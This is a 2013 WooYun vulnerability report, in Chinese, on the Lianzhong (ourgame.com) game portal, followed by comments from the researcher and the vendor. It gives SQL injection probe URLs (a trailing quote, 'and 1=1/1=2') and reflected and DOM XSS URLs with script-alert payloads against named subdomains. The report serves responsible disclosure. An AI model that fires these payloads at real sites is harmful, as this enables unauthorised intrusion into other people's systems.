当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-022118

漏洞标题:联众世界分站两sql注射+xss大礼包

相关厂商:联众世界

漏洞作者: 梧桐雨

提交时间:2013-04-19 08:53

修复时间:2013-04-24 08:54

公开时间:2013-04-24 08:54

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-04-19: 细节已通知厂商并且等待厂商处理中
2013-04-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

过滤不严谨导致的sql注射+xss

详细说明:

检测了一段时间了,攒在手里。一次性发了吧,给厂商预个警。
sql注射1:
http://bridge.ourgame.com/ladder/bridge/bridge_teamlist.asp?tid=1
http://bridge.ourgame.com/ladder/bridge/bridge_teamlist.asp?tid=1'

1.jpg


sql注射2:
http://glclub.ourgame.com/ladder/bridge_fee/gamelist_team.asp?tid=75
通过and 1=1 and 1=2判断。如图

2.jpg


3.jpg


反射型xss:(斟酌着来修复,有的不严重就忽略哈)
http://jh.ourgame.com/userinfo/userinfo.aspx?username="></iframe><script>alert(1)</script>
http://auth.ourgame.com/graphgamepassport!login.do?game=klsg&parent="/><script>alert(1)</script>&nexturl=
http://oldbbs.ourgame.com/msg/bbs_msg.asp?reg=1&msgID=50002&Subject_ID=615&BBs_ID=""/><script>alert(1)</script>
http://hr.ourgame.com/templates/index/iframe_query.jsp?src=../../../../../../"></iframe><script>alert(1)</script>
有的涉及到用户交互了。例如:
auth.ourgame.com以及oldbbs.ourgame.com两个子站等。
DOMXSS:flash小游戏
http://flash.ourgame.com/game/FPBCHMON?fromwhere=dt%22%0aalert(1)//

4.jpg


暂时就发现这些

漏洞证明:

见详细说明

修复方案:

该过滤的过滤,该转义的转义吧。。。厂商比我更清楚了。

版权声明:转载请注明来源 梧桐雨@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-04-24 08:54

厂商回复:

漏洞Rank:8 (WooYun评价)

最新状态:

2013-04-24:多谢,已经修复!


漏洞评价:

评论

  1. 2013-04-19 10:04 | 工作专用 ( 实习白帽子 | Rank:77 漏洞数:6 | 起什么名字好呢。)

    估计跟我是一个了。。

  2. 2013-04-24 10:19 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    为什么忽略了修复呢。。确认下很难么。。

  3. 2013-04-24 10:22 | 联众世界(乌云厂商)

    @梧桐雨 是系统的问题,不知道什么原因自动忽略了,我们在积极处理,兄弟的奖品也准备好了:)

  4. 2013-04-24 10:25 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    @联众世界 明白了,感谢